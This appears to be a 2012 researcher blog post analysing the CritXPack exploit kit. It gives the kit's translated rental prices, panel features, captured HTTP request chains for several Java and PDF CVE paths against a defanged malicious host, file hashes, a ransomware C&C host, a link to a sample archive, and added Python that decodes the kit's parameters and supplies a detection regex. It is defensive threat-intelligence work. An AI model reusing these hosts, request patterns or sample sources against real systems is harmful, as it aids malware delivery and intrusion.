2012-11-12 - Connect the dots.

Meet CritXPack (Previously Vintage Pack)

CritXPack

I first heard about this Exploit Kit through a tweet from Security Obscurity (thanks! :) )


It was named Vintage Pack at that time :


The enrollment form was simple :

Vintage Pack form to apply


Rental price: per month - $400, per week - $100
(translated from the Russian text of the form)

A few days ago the banner and name changed. Here is the new "apply" form:

CritXPack apply form


Here is the text :


Rent: 30$ - 1 day; 150$ - 1 week; 500$ - 1 month; traffic limit - 100k hits per day. 

License on your server: 600$ - 3 months; 900$ - 6 months; 1200$ - 1 year; +200$ - multidomain license. 

PS: We have changed the banner and the name that were used during the test period and the trial advertising campaign. The kit is now running in normal mode; the name and the banner will not change. At the moment there is NO advertising on the specialized forums. Feedback from our partners who use the kit and have a reputation on the relevant forums can be obtained PRIVATELY and only with their consent.

(translated from the Russian part; "связка", literally "bundle", is the forum slang for an exploit kit)


And thanks to Jindrich Kubec from Avast, who yesterday shared an unusual URL pattern

Jindrich Kubec tweet about the new kind of Url

we can now say hello to CritXPack.

CritXPack Login Screen 2012-11
Note the CAPTCHA (the third time I have seen one on a bad-guy panel, after Upas and then Blackhole 2.0)

Updated Login Screen (2013-02)


There are countermeasures against repeat hits (a second visit gets a 502 error).
There are some geolocation features (it seems so; the filtering could also be done outside of the EK):
Filter in action for a localized strike.

I tested different vulnerability paths on it:

CVE-2012-1723 (seems safe (?!) )

CVE-2012-1723 path on CritXPack (safe)



GET http://magrety.herapid .org/b081112s/i.php
200 OK (text/html)

GET http://magrety.herapid .org/b081112s/j.php?t=u0059u0053u0072u0074u0035u0044u0053u0053u0053u0046
200 OK (application/java-archive) -- 65571830100b0d809b44fefc094b5bf4


 65571830100b0d809b44fefc094b5bf4 nicely tagged in VirusTotal



CVE-2012-4681 Boom...

CVE-2012-4681 path in CritXPack 



GET http://magrety.herapid  .org/b081112s/i.php
200 OK (text/html)

GET http://magrety.herapid  .org/b081112s/j.php?t=u0059u0053u0072u0074u0035u0044u0053u0031u0072u0072
200 OK (application/java-archive)

GET http://magrety.herapid  .org/b081112s/j.php?t=u0059u0053u0072u0074u0035u0044u0053u0031u0072u0072
200 OK (application/java-archive)

GET http://magrety.herapid  .org/b081112s/load.php?e=u004au0061u0076u0061&token=u0064u0065u0066u0061u0075u006cu0074&
200 OK (application/octet-stream)


MDAC path (Seems safe)

MDAC path on CritXPack: safe, but note the PluginDetect 0.7.9 :)

GET http://magrety.herapid .org/b081112s/i.php
200 OK (text/html)

GET http://magrety.herapid .org/b081112s/js/pd.js
200 OK (application/javascript)



CVE-2011-2010 path (seems safe):

CVE-2011-2010 Path on CritXPack (safe)


GET http://magrety.herapid  .org/b081112s/i.php
200 OK (text/html)

GET http://magrety.herapid  .org/b081112s/js/pd.js
200 OK (application/javascript)

GET http://magrety.herapid  .org/b081112s/a.Test
404 Not Found (text/html)

CVE-2010-0188 Boom...


CVE-2010-0188 path in CritXPack

GET http://magrety.herapid  .org/b081112s/i.php
200 OK (text/html)

GET http://magrety.herapid  .org/b081112s/js/pd.js
304 Not Modified ()

GET http://magrety.herapid  .org/b081112s/a.Test
404 Not Found (text/html)

GET http://magrety.herapid  .org/b081112s/p5.php?t=u0059u0053u0072u0074u0035u0044u0072u0072u0035u0031&oh=ZFhYT3N6ekxGakhpWFo5ZGlIRk82ZjlVSGp6bEQ1IyMjWUJ6b1VGZjlPZE9SaU00RERBRDRERHJTNEREcnJwWFVQaT1NNEREclM0RERyQTRERHJyNEREciM0REQxQTRERHJXNEREMVNw
200 OK (application/pdf) -- d23236aaa9756f74d51c42e5109d7927

GET http://magrety.herapid  .org/b081112s/load.php?e=u0050u0064u0066&token=u0064u0065u0066u0061u0075u006cu0074&
200 OK (application/octet-stream)


CVE-2011-3544 Boom...

CVE-2011-3544 Path on CritXPack

GET http://magrety.herapid  .org/b081112s/i.php
200 OK (text/html)

GET http://magrety.herapid  .org/b081112s/js/pd.js
200 OK (application/javascript)

GET http://magrety.herapid  .org/b081112s/j.php?t=u0059u0053u0072u0074u0035u0044u0031u0041u0035u0044
200 OK (application/java-archive)

GET http://magrety.herapid  .org/b081112s/load.php?e=u004au0061u0076u0061&token=u0064u0065u0066u0061u0075u006cu0074&
200 OK (application/octet-stream)

CVE-2012-0507 Boom...

CVE-2012-0507 path on CritXPack




GET http://magrety.herapid .org/b081112s/i.php
200 OK (text/html)

GET http://magrety.herapid .org/b081112s/js/pd.js
200 OK (application/javascript)

GET http://magrety.herapid .org/b081112s/j.php?t=u0059u0053u0072u0074u0035u0072u0072u0035u0053u0035
200 OK (application/java-archive)

GET http://magrety.herapid .org/b081112s/load.php?e=u004au0061u0076u0061&token=u0064u0065u0066u0061u0075u006cu0074&
200 OK (application/octet-stream)
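The "unusual URL pattern" in the captures above decodes easily once you notice that the t=, e= and token= parameters are JavaScript \uXXXX escapes with the backslash stripped (u004au0061u0076u0061 is "Java"). The Python below is an added example, not code from the original post and not the kit's own code: it decodes the parameters of the requests captured above and carries a regex that can be run over proxy logs to flag the pattern. The real hostname is replaced by the reserved name ek.example.invalid, and the detection regex is my own generalisation from these captures (the file names j.php, p5.php, load.php and the parameter names are taken from them), not a published signature.

```python
import base64
import re
from urllib.parse import urlsplit

# One or more "uXXXX" units: the JavaScript "\uXXXX" escape with the backslash
# dropped, which is how the t=, e= and token= parameters appear in the captures.
U_ESCAPED_RE = re.compile(r"^(?:u[0-9a-fA-F]{4})+$")

# Detection regex for the request pattern. Assumption: the script names and
# parameter names are stable across installs; they come from the captures
# above, not from any published signature.
CRITX_URL_RE = re.compile(
    r"/(?:j|p5)\.php\?t=(?:u[0-9a-fA-F]{4}){6,}"                        # exploit fetch (Java / PDF)
    r"|/load\.php\?e=(?:u[0-9a-fA-F]{4})+&token=(?:u[0-9a-fA-F]{4})+"   # payload fetch
)

# Requests copied from the captures above (host replaced by ek.example.invalid
# so nothing here resolves). The last entry, PluginDetect, is a benign control.
CAPTURED_REQUESTS = [
    "http://ek.example.invalid/b081112s/j.php?t=u0059u0053u0072u0074u0035u0044u0053u0053u0053u0046",
    "http://ek.example.invalid/b081112s/j.php?t=u0059u0053u0072u0074u0035u0044u0053u0031u0072u0072",
    "http://ek.example.invalid/b081112s/load.php?e=u004au0061u0076u0061&token=u0064u0065u0066u0061u0075u006cu0074&",
    "http://ek.example.invalid/b081112s/p5.php?t=u0059u0053u0072u0074u0035u0044u0072u0072u0035u0031"
    "&oh=ZFhYT3N6ekxGakhpWFo5ZGlIRk82ZjlVSGp6bEQ1IyMjWUJ6b1VGZjlPZE9SaU00RERBRDRERHJTNEREcnJwWFVQaT1N"
    "NEREclM0RERyQTRERHJyNEREciM0REQxQTRERHJXNEREMVNw",
    "http://ek.example.invalid/b081112s/load.php?e=u0050u0064u0066&token=u0064u0065u0066u0061u0075u006cu0074&",
    "http://ek.example.invalid/b081112s/j.php?t=u0059u0053u0072u0074u0035u0044u0031u0041u0035u0044",
    "http://ek.example.invalid/b081112s/load.php?e=u004au0061u0076u0061&token=u0064u0065u0066u0061u0075u006cu0074&",
    "http://ek.example.invalid/b081112s/j.php?t=u0059u0053u0072u0074u0035u0072u0072u0035u0053u0035",
    "http://ek.example.invalid/b081112s/load.php?e=u004au0061u0076u0061&token=u0064u0065u0066u0061u0075u006cu0074&",
    "http://ek.example.invalid/b081112s/js/pd.js",
]


def decode_u_escapes(value: str) -> str:
    """'u004au0061u0076u0061' -> 'Java'. Refuses anything that is not purely
    uXXXX units, so ordinary text is never silently "decoded"."""
    if not U_ESCAPED_RE.match(value):
        raise ValueError(f"not a uXXXX-encoded value: {value!r}")
    return "".join(chr(int(value[i + 1:i + 5], 16)) for i in range(0, len(value), 5))


def decode_oh(value: str) -> bytes:
    """The oh= parameter is unpadded base64; re-pad before decoding. What comes
    out is still obfuscated text, so this strips only one layer."""
    return base64.b64decode(value + "=" * (-len(value) % 4))


def decode_request(url: str) -> dict:
    """Flag one URL against CRITX_URL_RE and decode the parameters we know."""
    parts = urlsplit(url)
    result = {"path": parts.path, "match": CRITX_URL_RE.search(url) is not None}
    # Split by hand rather than with parse_qs: parse_qs would turn a "+" in
    # base64 into a space and silently corrupt the oh= value.
    for pair in parts.query.split("&"):
        if not pair:
            continue  # the load.php requests end with a trailing "&"
        name, _, raw = pair.partition("=")
        if name in ("t", "e", "token"):
            result[name] = decode_u_escapes(raw)
        elif name == "oh":
            result[name] = decode_oh(raw)
        else:
            result[name] = raw
    return result


def decode_all(urls=CAPTURED_REQUESTS) -> list:
    return [decode_request(u) for u in urls]


if __name__ == "__main__":
    for r in decode_all():
        print(r)
```

Running it shows e= is "Java" or "Pdf", token= is always "default", and the five t= values all start with "YSrt5" and differ only in their last five characters, one value per exploit path. The oh= value base64-decodes to another string that is clearly still encoded (it contains "###" as a separator), so the regex, not the decoded content, is what you would put in a detection rule.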


What about the file tree of the server?
Here are some of the directories/files I was able to see:
/b081112s/load.php
/b081112s/cpt.php
/b081112s/panel.php
/b081112s/captcha.php
/b081112s/i.php
/b081112s/j.php
/b081112s/f/
/b081112s/config.php
/b081112s/img/space.png
/b081112s/img/btn_signin.png


Out of the scope of this post, but what about the payload?
a6a61216942a1de358c5b55d8fb66cb1 yesterday
and b333ccb16027f0e168ff1846ea913a58, something with a C&C here:
lezniklitoristorii   .in POST /image/ukash-psk/price.php HTTP/1.1
In my opinion it is directly related to the Ransomware Casier/GangstaService affiliate. You remember?
IE (Ireland) != IR (Iran). (Any feedback on the payload is welcome :). It may be just a Zbot/Citadel.)


All the files in one Zip:

Content of the Zip
http://goo.gl/0vbrG (Mega)

Want to read more about CVEs and Exploit Kits ?
Common Exploit Kits 2012 Poster - 2012-11-11 - Mila - Contagio
Wild Wild West - 2012-10-23 - Kahu Security
An Overview of Exploit Packs (Update 17) - 2012-10-12 - Mila - Contagio

Want to read more about the payload ?

Casier on botnets.fr
Ransomware Casier - Sharing Design with Lyposit - Gaelic & Persian (?) - 2012-09-19
Ransomware « Trojan.Casier » Panel - 2012-09-18 - Malekal Morte - Malekal's Site
Karagny.L unpack - 2012-09-04 - RootBsd - Malware.lu technical analysis
Gangstaservice Winlock Affiliate - 2012-08-01 - Xylitol - Xylibox

Post Publication :
Got Malware? Rent an Exploit Service - Kevin Stevens - The Day Before Zero - Damballa - 2013-01-29
Meet Safe Pack (v2.0)... Again :)  - 2013-04-21